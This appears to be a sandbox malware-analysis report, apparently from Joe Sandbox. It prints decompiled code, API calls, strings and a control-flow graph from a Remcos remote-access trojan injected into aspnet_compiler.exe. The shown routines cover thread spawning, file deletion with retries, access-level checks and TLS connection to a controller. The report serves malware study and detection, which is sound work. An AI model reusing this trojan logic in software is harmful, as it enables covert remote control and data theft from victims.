									E0040949A(0x473298, _t498, __eflags,  *_t140 & 0x000000ff, _v812, E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x31)), _t145, _t143, (_t139 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff); // executed
									__eflags =  *((char*)(E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x14)))) - 1;
									if(__eflags != 0) {
										_t287 = 0;
										__eflags = 0;
									} else {
										_t209 = 2;
										_t509 = E00432DF5(_t484, _t504, __eflags, _t209);
										_t287 = 0;
										 *_t509 = 0;
										_t418 = E00401E45(0x473298, _t484, _t517, __eflags, 0x35);
										__eflags =  *(E00401F8B(_t418));
										 *((char*)(_t509 + 1)) = _t418 & 0xffffff00 | __eflags != 0x00000000;
										CreateThread(0, 0, E00418B0F, _t509, 0, 0);
									}
									_t501 = 0x473298;
									__eflags =  *((char*)(E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x16)))) - 1;
									if(__eflags == 0) {
										_t204 = 2;
										_t508 = E00432DF5(_t484, 0x473298, __eflags, _t204);
										 *_t508 = 1;
										_t414 = E00401E45(0x473298, _t484, _t517, __eflags, 0x35);
										_t207 = E00401F8B(_t414);
										__eflags =  *_t207;
										_t49 =  *_t207 != 0;
										__eflags = _t49;
										 *((char*)(_t508 + 1)) = _t414 & 0xffffff00 | _t49;
										CreateThread(_t287, _t287, E00418B0F, _t508, _t287, _t287);
										_t501 = 0x473298;
									}
									__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t484, _t517, __eflags, 0x23)))) - 1;
									if(__eflags == 0) {
										 *0x470a85 = 1;
										_t197 = E00401F8B(E00401E45(_t501, _t484, _t517, __eflags, 0x25));
										_t199 = E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x26));
										_t484 =  *_t197;
										E00401EF3(0x472d40,  *_t197, _t197, E0040CEEC( &_v780,  *_t197, _t199));
										E00401EE9();
										CreateThread(_t287, _t287, E00401BC9, _t287, _t287, _t287);
										_t501 = 0x473298;
									}
									__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t484, _t517, __eflags, 0x2b)))) - 1;
									if(__eflags == 0) {
										_t501 = E00401F8B(E00401E45(_t501, _t484, _t517, __eflags, 0x2c));
										_t194 = E0043A3AC(_t192, E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x2d)));
										__eflags =  *_t501;
										_t484 = _t194;
										__eflags =  *_t501 != 0;
										E0040B6DC(_t194);
									}
									_t158 = E0041A168( &_v772, _t484, _t498, __eflags); // executed
									E00401EF3(0x4732a4, _t484, _t501, _t158);
									E00401EE9();
									_t161 =  *0x472ae0;
									__eflags = _t161;
									if(_t161 != 0) {
										_t161->nLength(_t287); // executed
									}
									CreateThread(_t287, _t287, E0040ECEA, _t287, _t287, _t287); // executed
									__eflags =  *0x470d4b;
									if( *0x470d4b != 0) {
										CreateThread(_t287, _t287, E0041163A, _t287, _t287, _t287);
									}
									__eflags =  *0x470d60;
									if( *0x470d60 != 0) {
										CreateThread(_t287, _t287, E00411C1E, _t287, _t287, _t287);
									}
									_t163 =  *0x46f9d0; // 0x1
									_t164 = _t163 - _t287;
									__eflags = _t164;
									if(__eflags == 0) {
										_push("User");
										goto L67;
									} else {
										__eflags = _t164 - 1;
										if(__eflags == 0) {
											_push("Administrator");
											L67:
											E004052DD(_t287, _t531 - 0x18, "Access Level: ", _t517, __eflags, E00402073(_t287,  &_v776, _t484, _t517));
											E00402073(_t287, _t531 - 4, "Access Level: ", _t517, "i");
											E0041A04A(_t287, _t498);
											E00401FB8();
										}
									}
									_t497 = 0x473238;
									_t171 = E004127E7(0x473238, E00401F8B(0x473238), "del"); // executed
									_pop(_t382);
									__eflags = _t171;
									if(__eflags != 0) {
										E00412903( &_v752, 0x80000001, E00401EE4(E0041A7B9( &_v776, 0x473238)), L"del");
										E00401EE9();
										_t179 = E00401EE4( &_v752);
										_t501 = DeleteFileW;
										while(1) {
											_t180 = DeleteFileW(_t179);
											__eflags = _t180;
											if(_t180 != 0) {
												break;
											}
											__eflags = _t287 - 0xa;
											if(_t287 < 0xa) {
												_t287 =  &(_t287->nLength);
												__eflags = _t287;
												Sleep(0xa);
												_t179 = E00401EE4( &_v752);
												continue;
											}
											goto L75;
										}
										goto L75;
									}
									goto L76;
								} else {
									_t232 = E00401E45(0x473298, "0", _t517, __eflags, 0xd);
									_t535 = _t526 - 0x18;
									_t483 = _t232;
									E0041A7B9(_t535, _t232);
									_t234 = E0040E991(__eflags);
									_t526 = _t535 + 0x18;
									__eflags = _t234 - 1;
									if(__eflags != 0) {
										goto L42;
									} else {
										_push(3);
										goto L39;
									}
								}
							}
						} else {
							_push(2);
							L39:
							_pop(_t511);
							goto L40;
						}
					} else {
						E00401FC2(0x473370, 0x473268, 0x473298, E00406292( &_v772, 0x473268, _t517, "-W"));
						E00401FB8();
						_v784 = 0;
						_t481 = E00401F8B(0x473238);
						__eflags = E00412831(_t282, "WD",  &_v784);
						if(__eflags != 0) {
							E00412C91(E00401F8B(0x473238), __eflags, "WD");
							E004119B8();
							L75:
							E00412D0B(0x80000001, E00401EE4(E0041A7B9( &_v776, _t497)), L"del");
							E00401EE9();
							_t382 =  &_v752;
							E00401EE9(); // executed
							L76:
							E0040D246(__eflags); // executed
							E00414271(); // executed
							asm("int3");
							_push(_t501);
							_t505 = _t382 + 0x68;
							E0040F0C7(_t287, _t505, _t505);
							_t305 = _t505;
							 *_t305 = 0x465554;
							 *_t305 = 0x465510;
							return E00434069(_t305);
						} else {
							goto L5;
						}
					}
				} else {
					_push(__ecx);
					_push(__ecx);
					__ecx =  &_v700;
					__eax = E0040F0F6( &_v700, __edx, __eflags, "license_code.txt", 2);
					__ecx = 0x473298;
					__ecx = E00401E45(0x473298, __edx, __ebp, __eflags, 0x34);
					__edx = __eax;
					__ecx =  &_v720;
					__eax = E0041047A( &_v720, __edx, __eflags);
					__ecx =  &_v720;
					__eax = E0040F0A7( &_v720, __edx, __eflags);
					__ecx =  &_v720;
					L77();
					0 = 1;
					L40:
					E00401FB8();
					return _t511;
				}
			}






























































































                    0x0040dec9
                    0x0040dec9
                    0x0040deca
                    0x0040ded8
                    0x0040dedd
                    0x0040dee0
                    0x0040deef
                    0x0040def2
                    0x0040defc
                    0x0040df01
                    0x0040df0b
                    0x0040df10
                    0x0040df1a
                    0x0040df23
                    0x0040df28
                    0x0040df2c
                    0x0040df35
                    0x0040df42
                    0x0040df48
                    0x0040df4b
                    0x0040df99
                    0x0040df9a
                    0x0040dfb7
                    0x0040dfba
                    0x0040dfd6
                    0x0040dfe8
                    0x0040dff1
                    0x0040dffa
                    0x0040e00e
                    0x0040e01d
                    0x0040e027
                    0x0040e038
                    0x0040e03b
                    0x0040e042
                    0x0040e049
                    0x0040e04e
                    0x0040e051
                    0x0040e058
                    0x0040e05f
                    0x0040e0b2
                    0x0040e0b6
                    0x0040e0ba
                    0x0040e0bf
                    0x0040e0c4
                    0x0040e0cb
                    0x0040e0cd
                    0x0040e0ec
                    0x0040e0ee
                    0x0040e0f0
                    0x0040e0f8
                    0x0040e0ff
                    0x0040e0ff
                    0x0040e11b
                    0x0040e11d
                    0x0040e123
                    0x0040e124
                    0x0040e126
                    0x0040e134
                    0x0040e136
                    0x0040e13b
                    0x0040e13b
                    0x0040e13c
                    0x0040e13c
                    0x0040e141
                    0x0040e146
                    0x0040e148
                    0x0040e151
                    0x0040e156
                    0x0040e158
                    0x0040e15a
                    0x0040e15a
                    0x0040e15c
                    0x0040e161
                    0x0040e166
                    0x0040e168
                    0x0040e16c
                    0x0040e16c
                    0x0040e171
                    0x0040e175
                    0x0040e17c
                    0x0040e17e
                    0x0040e180
                    0x0040e185
                    0x0040e185
                    0x0040e19a
                    0x0040e19d
                    0x0040e19f
                    0x0040e1a5
                    0x0040e1a7
                    0x0040e1ad
                    0x0040e1af
                    0x0040e1af
                    0x0040e1ad
                    0x0040e1a5
                    0x0040e19d
                    0x0040e1c4
                    0x0040e1c7
                    0x0040e1c9
                    0x0040e1c9
                    0x0040e1e4
                    0x0040e1fd
                    0x0040e200
                    0x0040e217
                    0x0040e21a
                    0x0040e230
                    0x0040e233
                    0x0040e246
                    0x0040e249
                    0x0040e262
                    0x0040e264
                    0x0040e271
                    0x0040e286
                    0x0040e28b
                    0x0040e29e
                    0x0040e2a7
                    0x0040e2ac
                    0x0040e2ac
                    0x0040e264
                    0x0040e2b1
                    0x0040e2b5
                    0x0040e446
                    0x0040e44e
                    0x0040e455
                    0x0040e45d
                    0x0040e47b
                    0x0040e47d
                    0x0040e482
                    0x0040e492
                    0x0040e497
                    0x00000000
                    0x0040e2bb
                    0x0040e2bb
                    0x0040e2c2
                    0x0040e34a
                    0x0040e2c4
                    0x0040e2cf
                    0x0040e2ea
                    0x0040e2f3
                    0x0040e2f8
                    0x0040e2fa
                    0x0040e2ff
                    0x0040e31c
                    0x0040e336
                    0x0040e33b
                    0x0040e33b
                    0x0040e354
                    0x0040e35e
                    0x0040e366
                    0x0040e368
                    0x0040e36e
                    0x0040e371
                    0x0040e373
                    0x0040e382
                    0x0040e375
                    0x0040e378
                    0x0040e37d
                    0x0040e37d
                    0x0040e390
                    0x0040e396
                    0x0040e39d
                    0x0040e3a5
                    0x0040e3b0
                    0x0040e3cf
                    0x0040e3d5
                    0x0040e3da
                    0x0040e3dd
                    0x0040e3e6
                    0x0040e3eb
                    0x0040e3f7
                    0x0040e3f9
                    0x0040e49c
                    0x0040e49c
                    0x0040e4a9
                    0x0040e4ae
                    0x0040e4b4
                    0x0040e4b9
                    0x0040e4c8
                    0x0040e4ca
                    0x0040e4cf
                    0x0040e4e3
                    0x0040e4e8
                    0x0040e4ee
                    0x0040e4f0
                    0x0040e50d
                    0x0040e50f
                    0x0040e515
                    0x0040e511
                    0x0040e511
                    0x00000000
                    0x0040e511
                    0x0040e4f2
                    0x0040e4f2
                    0x0040e4f4
                    0x0040e4f4
                    0x0040e503
                    0x0040e509
                    0x0040e509
                    0x0040e51b
                    0x0040e525
                    0x0040e52a
                    0x0040e534
                    0x0040e539
                    0x0040e53e
                    0x0040e54c
                    0x0040e569
                    0x0040e574
                    0x0040e579
                    0x0040e57b
                    0x0040e59a
                    0x0040e5ac
                    0x0040e5cb
                    0x0040e5e0
                    0x0040e5e3
                    0x0040e61e
                    0x0040e61e
                    0x0040e5e5
                    0x0040e5e7
                    0x0040e5ee
                    0x0040e5f0
                    0x0040e5fa
                    0x0040e601
                    0x0040e60b
                    0x0040e617
                    0x0040e61a
                    0x0040e61a
                    0x0040e620
                    0x0040e635
                    0x0040e638
                    0x0040e63c
                    0x0040e643
                    0x0040e64d
                    0x0040e655
                    0x0040e657
                    0x0040e65f
                    0x0040e668
                    0x0040e668
                    0x0040e66c
                    0x0040e66f
                    0x0040e671
                    0x0040e671
                    0x0040e686
                    0x0040e689
                    0x0040e68f
                    0x0040e69d
                    0x0040e6b2
                    0x0040e6b7
                    0x0040e6ca
                    0x0040e6d3
                    0x0040e6e2
                    0x0040e6e4
                    0x0040e6e4
                    0x0040e6f9
                    0x0040e6fc
                    0x0040e715
                    0x0040e724
                    0x0040e729
                    0x0040e72c
                    0x0040e72f
                    0x0040e732
                    0x0040e732
                    0x0040e73b
                    0x0040e746
                    0x0040e74f
                    0x0040e754
                    0x0040e759
                    0x0040e75b
                    0x0040e75e
                    0x0040e75e
                    0x0040e76a
                    0x0040e76c
                    0x0040e773
                    0x0040e77f
                    0x0040e77f
                    0x0040e781
                    0x0040e788
                    0x0040e794
                    0x0040e794
                    0x0040e796
                    0x0040e79b
                    0x0040e79b
                    0x0040e79d
                    0x0040e7ab
                    0x00000000
                    0x0040e79f
                    0x0040e79f
                    0x0040e7a2
                    0x0040e7a4
                    0x0040e7b0
                    0x0040e7c4
                    0x0040e7d3
                    0x0040e7d8
                    0x0040e7e4
                    0x0040e7e4
                    0x0040e7a2
                    0x0040e7e9
                    0x0040e7fc
                    0x0040e801
                    0x0040e802
                    0x0040e804
                    0x0040e82b
                    0x0040e836
                    0x0040e83f
                    0x0040e844
                    0x0040e863
                    0x0040e864
                    0x0040e866
                    0x0040e868
                    0x00000000
                    0x00000000
                    0x0040e84c
                    0x0040e84f
                    0x0040e853
                    0x0040e853
                    0x0040e854
                    0x0040e85e
                    0x00000000
                    0x0040e85e
                    0x00000000
                    0x0040e84f
                    0x00000000
                    0x0040e86a
                    0x00000000
                    0x0040e3ff
                    0x0040e403
                    0x0040e408
                    0x0040e40b
                    0x0040e40f
                    0x0040e414
                    0x0040e419
                    0x0040e41c
                    0x0040e41e
                    0x00000000
                    0x0040e420
                    0x0040e420
                    0x00000000
                    0x0040e420
                    0x0040e41e
                    0x0040e3f9
                    0x0040e14a
                    0x0040e14a
                    0x0040e422
                    0x0040e422
                    0x00000000
                    0x0040e422
                    0x0040e061
                    0x0040e07b
                    0x0040e084
                    0x0040e08d
                    0x0040e0a1
                    0x0040e0aa
                    0x0040e0ac
                    0x0040e87d
                    0x0040e887
                    0x0040e88c
                    0x0040e8aa
                    0x0040e8b4
                    0x0040e8b9
                    0x0040e8bd
                    0x0040e8c2
                    0x0040e8c2
                    0x0040e8c7
                    0x0040e8cc
                    0x0040e8cd
                    0x0040e8ce
                    0x0040e8d3
                    0x0040e8d8
                    0x0040fc1a
                    0x0040dd91
                    0x0040dd9d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040e0ac
                    0x0040df4d
                    0x0040df4d
                    0x0040df4e
                    0x0040df56
                    0x0040df5a
                    0x0040df61
                    0x0040df6b
                    0x0040df72
                    0x0040df74
                    0x0040df78
                    0x0040df7d
                    0x0040df81
                    0x0040df86
                    0x0040df8a
                    0x0040df91
                    0x0040e423
                    0x0040e427
                    0x0040e434
                    0x0040e434

                    APIs
                      • Part of subcall function 0041B4C9: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040DEE5), ref: 0041B4DE
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B4E7
                      • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040DEE5), ref: 0041B4FE
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B501
                      • Part of subcall function 0041B4C9: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040DEE5), ref: 0041B513
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B516
                      • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040DEE5), ref: 0041B52C
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B52F
                      • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040DEE5), ref: 0041B540
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B543
                      • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040DEE5), ref: 0041B558
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B55B
                      • Part of subcall function 0041B4C9: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040DEE5), ref: 0041B56C
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B56F
                      • Part of subcall function 0041B4C9: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040DEE5), ref: 0041B57B
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B57E
                      • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040DEE5), ref: 0041B590
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B593
                      • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040DEE5), ref: 0041B5A0
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5A3
                      • Part of subcall function 0041B4C9: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040DEE5), ref: 0041B5B4
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5B7
                      • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040DEE5), ref: 0041B5C4
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5C7
                      • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040DEE5), ref: 0041B5D9
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5DC
                      • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040DEE5), ref: 0041B5E9
                      • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5EC
                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000104), ref: 0040DEF2
                    • OpenMutexA.KERNEL32 ref: 0040E0E6
                      • Part of subcall function 0041047A: __EH_prolog.LIBCMT ref: 0041047F
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologMutexNameOpen
                    • String ID: 2G$ 2G$ 2G$ 2G$ 2G$82G$82G$82G$82G$82G$82G$82G$82G$@-G$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$Exe$Inj$P2G$Remcos Agent initialized$Software\$User$del$del$exepath$h2G$h2G$licence$license_code.txt$p3G$Cqt
                    • API String ID: 1897280938-2901791990
                    • Opcode ID: 49a7957580137d1cb05b4e46d324b6582d4b73a72f3b266621ac4389117076e3
                    • Instruction ID: 9e1fa40da8247c9b585ea9a59a3a54fb039144435d37588c5c456d259acc364f
                    • Opcode Fuzzy Hash: 49a7957580137d1cb05b4e46d324b6582d4b73a72f3b266621ac4389117076e3
                    • Instruction Fuzzy Hash: 3532E670B0434167DA14BB729C57B6E26998F81708F04487FB946BB2E3EE7C8D45839E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00414271 Relevance: 46.3, APIs: 5, Strings: 21, Instructions: 805sleepnetworkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 451 414271-4142b9 call 4020bf call 41a40e call 4020bf call 401e45 call 401f8b call 43a3ac 464 4142c8-414314 call 402073 call 401e45 call 4020d6 call 41a976 call 40487e call 401e45 call 40af37 451->464 465 4142bb-4142c2 Sleep 451->465 480 414316-414385 call 401e45 call 40245c call 401e45 call 401f8b call 401e45 call 40245c call 401e45 call 401f8b call 401e45 call 40245c call 401e45 call 401f8b call 40471d 464->480 481 414388-414423 call 402073 call 401e45 call 4020d6 call 41a976 call 401e45 * 2 call 406292 call 402ef0 call 401fc2 call 401fb8 * 2 call 401e45 call 405ae5 464->481 465->464 480->481 534 414433-41443a 481->534 535 414425-414431 481->535 536 41443f-4144d1 call 405a86 call 4052fe call 408832 call 402ef0 call 402073 call 41a04a call 401fb8 * 2 call 401e45 call 401f8b call 401e45 call 401f8b call 414230 534->536 535->536 563 4144d3-414517 WSAGetLastError call 41b45a call 4052dd call 402073 call 41a04a call 401fb8 536->563 564 41451c-41452a call 40480d 536->564 585 414dd5-414dd7 call 404e06 563->585 569 414557-41456c call 404f31 call 4048a8 564->569 570 41452c-414552 call 402073 * 2 call 41a04a 564->570 584 414572-4146c5 call 401e45 * 2 call 4052fe call 408832 call 402ef0 call 408832 call 402ef0 call 402073 call 41a04a call 401fb8 * 4 call 41a33b call 413904 call 4086d0 call 440751 call 401e45 call 4020d6 call 40245c call 401f8b * 2 call 4129e0 569->584 569->585 570->585 651 4146c7-4146d4 call 405a86 584->651 652 4146d9-414700 call 401f8b call 41288e 584->652 594 414ddc-414de7 call 4021da 585->594 600 414de9-414e09 call 401e45 call 401f8b call 43a3ac Sleep 594->600 601 414e0f-414e17 call 401e6d 594->601 600->601 601->481 651->652 658 414702-414704 652->658 659 414707-414abc call 40415e call 40d28d call 41a79d call 41a879 call 41a6e9 call 401e45 GetTickCount call 41a6e9 call 41a641 call 41a6e9 call 41a5f1 call 41a879 * 5 call 40ee14 call 41a879 call 402f11 call 402e81 call 402ef0 call 402e81 call 402ef0 * 3 call 402e81 call 402ef0 call 408832 call 402ef0 call 408832 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 408853 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 408832 call 402ef0 * 5 call 402e81 call 402ef0 call 402e81 call 402ef0 * 7 call 402e81 652->659 658->659 783 414abe call 404a81 659->783 784 414ac3-414d3c call 401fb8 * 50 call 401ee9 call 401fb8 * 5 call 401ee9 call 404bf0 783->784 900 414d41-414d48 784->900 901 414d4a-414d51 900->901 902 414d5c-414d63 900->902 901->902 905 414d53-414d55 901->905 903 414d65-414d6a call 40a5c4 902->903 904 414d6f-414da1 call 405a4b call 402073 * 2 call 41a04a 902->904 903->904 916 414da3-414dae 904->916 917 414db5-414dd0 call 401fb8 * 2 call 401ee9 904->917 905->902 916->917 917->585
                    C-Code - Quality: 89%
                    			E00414271() {
				char _v16;
				char _v40;
				char _v64;
				char _v76;
				char _v100;
				char _v124;
				char _v136;
				void* _v159;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				char _v496;
				char _v520;
				char _v544;
				char _v568;
				char _v592;
				char _v616;
				char _v640;
				char _v664;
				char _v688;
				char _v712;
				char _v736;
				char _v760;
				char _v784;
				char _v808;
				char _v832;
				char _v856;
				char _v880;
				char _v904;
				char _v928;
				char _v952;
				char _v976;
				char _v1000;
				char _v1024;
				char _v1048;
				char _v1072;
				char _v1096;
				char _v1120;
				char _v1144;
				char _v1168;
				char _v1192;
				char _v1216;
				char _v1240;
				char _v1264;
				char _v1288;
				char _v1312;
				char _v1336;
				char _v1360;
				char _v1384;
				char _v1408;
				char _v1432;
				char _v1456;
				char _v1480;
				char _v1504;
				char _v1528;
				char _v1552;
				char _v1576;
				char _v2580;
				signed int _t177;
				void* _t179;
				long _t184;
				void* _t186;
				void* _t189;
				void* _t197;
				char* _t208;
				void* _t210;
				void* _t211;
				struct _SECURITY_ATTRIBUTES* _t212;
				struct _SECURITY_ATTRIBUTES* _t214;
				void* _t216;
				long _t221;
				void* _t222;
				void* _t223;
				void* _t237;
				void* _t245;
				void* _t246;
				struct _SECURITY_ATTRIBUTES* _t249;
				intOrPtr* _t252;
				void* _t254;
				void* _t255;
				void* _t258;
				void* _t259;
				void* _t260;
				void* _t263;
				void* _t265;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				void* _t273;
				void* _t274;
				void* _t275;
				intOrPtr* _t379;
				void* _t395;
				void* _t401;
				void* _t403;
				void* _t405;
				void* _t407;
				char* _t409;
				long _t413;
				void* _t414;
				struct _SECURITY_ATTRIBUTES* _t415;
				char* _t443;
				char* _t487;
				void* _t678;
				void* _t690;
				void* _t749;
				signed short _t751;
				void* _t760;
				void* _t761;
				void* _t762;
				void* _t763;
				void* _t764;
				void* _t765;
				void* _t766;
				void* _t767;
				void* _t768;
				void* _t769;
				void* _t770;
				void* _t771;
				void* _t775;
				void* _t776;
				void* _t777;
				void* _t778;
				void* _t779;
				void* _t780;
				void* _t781;
				void* _t782;
				void* _t783;
				void* _t784;
				long _t786;

				_push(_t414);
				_push(_t753);
				E004020BF(_t414,  &_v100);
				E0041A40E( &_v280, _t678);
				E004020BF(_t414,  &_v1576);
				_t749 = 0x473298;
				_t177 = E0043A3AC(_t175, E00401F8B(E00401E45(0x473298, _t678, _t760, _t784, 0x29)));
				if(_t177 != 0) {
					_t413 = _t177 * 0x3e8;
					_t786 = _t413;
					Sleep(_t413);
				}
				_t762 = _t761 - 0x18;
				E00402073(_t414, _t762, _t678, _t760, 0x46a630);
				_t179 = E00401E45(_t749, _t678, _t760, _t786, 0);
				_t763 = _t762 - 0x18;
				E004020D6(_t414, _t763, _t678, _t786, _t179);
				E0041A976( &_v76, _t678);
				_t764 = _t763 + 0x30;
				_t415 = 0; // executed
				E0040487E(); // executed
				E00401E45(_t749, _t678, _t760, _t786, 0x3a);
				_t679 = 0x464074;
				_t184 = E0040AF37(_t786);
				_t787 = _t184;
				if(_t184 != 0) {
					E00401E45(_t749, 0x464074, _t760, _t787, 0x3a);
					_t401 = E0040245C();
					_t403 = E00401F8B(E00401E45(_t749, 0x464074, _t760, _t787, 0x3a));
					E00401E45(_t749, 0x464074, _t760, _t787, 0x39);
					_t405 = E0040245C();
					_t407 = E00401F8B(E00401E45(_t749, 0x464074, _t760, _t787, 0x39));
					E00401E45(_t749, 0x464074, _t760, _t787, 0x38);
					_t409 = E0040245C();
					_t753 = _t409;
					E00401F8B(E00401E45(_t749, _t679, _t760, _t787, 0x38));
					_t679 = _t409;
					E0040471D(0, _t409, _t760, _t407, _t405, _t403, _t401);
					_t764 = _t764 + 0x10;
				}
				L4:
				_t765 = _t764 - 0x18;
				 *0x473519 = 1;
				E00402073(_t415, _t765, _t679, _t760, 0x46a634);
				_t186 = E00401E45( &_v76, _t679, _t760, _t787, _t415);
				_t766 = _t765 - 0x18;
				E004020D6(_t415, _t766, _t679, _t787, _t186);
				E0041A976( &_v16, _t679);
				_t767 = _t766 + 0x30;
				_t189 = E00401E45( &_v16, _t679, _t760, _t787, 1);
				E00401FC2(0x47351c, _t191, _t753, E00402EF0(_t415,  &_v40, E00406292( &_v64, E00401E45( &_v16, _t679, _t760, _t787, 0), _t760, 0x46a634), _t760, _t787, _t189));
				E00401FB8();
				E00401FB8();
				E00401E45( &_v16, _t191, _t760, _t787, 2);
				_t682 = "0";
				_t197 = E00405AE5("0");
				_t443 =  &_v100;
				_t788 = _t197;
				if(_t197 == 0) {
					 *0x470ae4 = 1;
					_push("TLS On ");
				} else {
					 *0x470ae4 = 0;
					_push("TLS Off");
				}
				L00405A86(_t415, _t443, _t682);
				_t768 = _t767 - 0x18;
				E00402EF0(_t415, _t768, E00408832(_t415,  &_v40, E004052FE( &_v64, "Connecting  | ", _t760,  &_v100), _t749, _t760, _t788, " | "), _t760, _t788, 0x47351c);
				_t769 = _t768 - 0x14;
				E00402073(_t415, _t769, _t201, _t760, "i");
				E0041A04A(_t415, _t749);
				_t764 = _t769 + 0x30;
				E00401FB8();
				E00401FB8();
				_t208 = E00401F8B(E00401E45( &_v16, _t201, _t760, _t788, 1));
				_t210 = E00401F8B(E00401E45( &_v16, _t201, _t760, _t788, 0));
				_t679 = _t208;
				_t211 = E00414230(_t210, _t208,  &_v64,  &_v64);
				_t789 = _t211;
				if(_t211 == 0) {
					_t753 = 0x4734e8;
					_t212 = E0040480D(0x4734e8);
					__eflags = _t212;
					if(_t212 != 0) {
						E00404F31(0x4734e8, 0x3c, 0); // executed
						_t214 = E004048A8(0x4734e8, 0x4734e8, 0x4734e8); // executed
						__eflags = _t214;
						if(__eflags != 0) {
							_t222 = E00401E45( &_v16, _t679, _t760, __eflags, 1);
							_t770 = _t764 - 0x18;
							_t223 = E00401E45( &_v16, _t679, _t760, __eflags, 0);
							_t690 = E00408832(_t415,  &_v124, E00402EF0(_t415,  &_v208, E00408832(_t415,  &_v232, E004052FE( &_v256, "Connected   | ", _t760,  &_v100), _t749, _t760, __eflags, " | "), _t760, __eflags, _t223), _t749, _t760, __eflags, 0x46a634);
							E00402EF0(_t415, _t770, _t690, _t760, __eflags, _t222);
							_t771 = _t770 - 0x14;
							E00402073(_t415, _t771, _t690, _t760, "i");
							E0041A04A(_t415, _t749);
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							_v160 = 0;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd"); // executed
							_t237 = E0041A33B( &_v256); // executed
							_push(_t690);
							E00413904( &_v160, "%I64u", _t237);
							E004086D0(_t415,  &_v40, _t690, __eflags, 0x4730a0);
							E00440751( &_v40,  *0x46f9d0,  &_v136, 0xa);
							E004020D6(_t415,  &_v184, _t690, __eflags, E00401E45(0x473298, _t690, _t760, __eflags, 1));
							_t245 = E0040245C();
							_t246 = E00401F8B(0x473280);
							_t487 = 0x473238;
							_t691 = E00401F8B(0x473238); // executed
							_t249 = E004129E0(_t248, "name",  &_v2580, 0x104, _t246, _t245); // executed
							_t775 = _t771 + 0x60;
							__eflags = _t249;
							if(_t249 != 0) {
								_t487 =  &_v184;
								L00405A86(_t415, _t487, _t691,  &_v2580);
							}
							_push(_t487);
							E0041288E( &_v64, 0x80000001, E00401F8B(0x473238), "hlight");
							_t252 =  *0x470d58; // 0x0
							_t776 = _t775 + 0xc;
							_t751 = 0;
							__eflags = _t252;
							if(__eflags != 0) {
								_t751 =  *_t252() & 0x0000ffff;
							}
